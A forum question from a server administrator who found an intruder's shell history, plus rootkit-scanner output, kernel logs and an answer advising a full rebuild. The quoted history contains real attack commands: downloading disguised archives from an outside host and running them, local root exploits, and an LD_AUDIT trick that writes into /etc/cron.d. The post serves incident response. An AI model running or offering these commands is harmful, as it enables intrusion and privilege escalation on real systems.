I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access.
I found this in an ftp user .bash_history file:
w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh
vi a.sh
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd
The system is in a jail. Does it matter in the current case?
What shall i do?
Thanks for everyone!!
I have done these:
– ban the connected ssh host with iptables
– stoped the sshd in the jail
– saved: bach_history, syslog, dmesg, files in the bash_history's wget lines
I installed rkhunter and unhide as well. I ran "unhide sys" command and it resulted 1 hidden process.
Now I'm running rkhunter… OK.
rkhunter -c resulted some warnings:
-
in the jail:
Checking if SSH root access is allowed [ Warning ]
Checking for syslog configuration file [ Warning ]Performing filesystem checks
Checking for hidden files and directories [ Warning ] -
host system:
Performing filesystem checks
Checking /dev for suspicious file types [ Warning ]
Checking for hidden files and directories [ Warning ]
I found in dmesg and syslog that the hacker tried something to do with irda:
- syslog:
Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()
Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23
Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8)
Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29
Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted
- dmesg:
[4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Best Answer
Take your system down, back it up for future forensic analysis, then re-build from scratch and restore any needed data from a known good backup. Anything short of that leaves the possibility of latent malicious code being put to use.